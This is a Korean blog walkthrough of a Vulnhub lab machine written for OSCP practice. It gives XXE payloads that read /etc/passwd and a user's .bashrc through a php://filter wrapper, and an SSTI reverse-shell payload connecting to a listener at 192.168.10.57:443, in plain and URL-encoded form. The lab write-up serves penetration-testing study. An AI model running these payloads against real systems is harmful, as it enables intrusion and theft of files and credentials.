# XXE

# XXE PHP filter

# SSTI

 

 


 

 

1. Information Garhering

 

: nmap

 

 

: 80

 

> DIG DIG이 힌트인가?

 

: dig

 

> IP밖에 몰라 조회가 어려움

 

 

 

: 53 확인

 

 

 

: 소스코드 확인

 

> 주석 처리된 버튼 있는데

어차피 앵커가 빈 값

 

제거하면,

 

 

 

: 다른 주석은

 

> Use a Get parameter page_no to view pages.

시키는 대로 해보면 추가 힌트가 주어지고

 

 

: 버프 인터루더로 넘버링을 보내보면

 

> 21번이 값이 다름!

 

: 붙어보면

 

> subdomain 을 알려주고

 

 

: 호스트 등록 후

 

 

 

: 다시 DIG

 

> authority section에 섭도메인 찾음!

 

 

: 호스트 다시 등록 후

 

 

: 붙어보면

 

> 계정 생성 가능한데

 

 

: 해보면

 

: 안됨

 

 

: 요청 시 소스를 보면

 

xml 형태로 넘어가고

 

 

: xxe (XML Entity Injection) 시도 시

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY takudaddy_XXE SYSTEM 'file:///etc/passwd'>]>
<root>
<name>
</name><tel>
</tel><email>
&takudaddy_XXE;
</email><password></password></root>
 

<email> 태그가 취약!

사용자 정보 확인 후

 

 

: php 필터 기능으로 .bashrc 정보 추출

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY takudaddy_XXE SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>
<root>
<name>
</name><tel>
</tel><email>
&takudaddy_XXE;
</email><password></password></root>
 

 

 

: 디코딩 해 살펴보면

 

어드민 계정 정보 확인이 가능!

 

 

 

 

 

2. Exploitation

 

: 9999

 

: admin 시도 시

 

실패!

 

 

: saket 사용자로 시도 시

 

성공! 이름을 말하라고?

 

 

: name 파라미터를 붙여보면

 

뭔가 되는 듯!

 

 

:SSTI (Server Side Template Injection) 시도 시

 

먹힘!

 

 

 

: 리버스 쉘

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.10.57/443 0>&1"')}}

# url-encoding 해야함!
{%25+import+os+%25}{{os.system('bash+-c+"bash+-i+>%26+/dev/tcp/192.168.10.58/443+0>%261"')}}
 

리스너 기동 후

URL-encoding 해

입력하면

 

 

침투 성공!

 

 


 

 

3. Privilege Escalation

 

 

root로 su,

tmp에서

python2.7로 inject.py 번호 실시 후

nc로 5600 포트 붙었었고

root process 확인,

다시 python2.7 inject.py 번호를 실행했고

다시 5600 붙었음.

 

확인해 본다

 

linpeas.sh

 

 

 

위 블로그에서 올라와 있던

python 스크립트가 삭제되어

exploit을 따로 제작해야함

 

추후 진행

 

 

 

 

 

728x90
반응형

'OSCP > Vulnahub' 카테고리의 다른 글

[+] WinterMute (Pivoting - 중요)*  (0) 2023.01.21
[+] Hack Me Please  (0) 2023.01.20
[+] Typo  (0) 2023.01.18
37. LazySysAdmin  (0) 2021.11.18
36. Mr-Robot (sort | uniq)  (2) 2021.11.11

+ Recent posts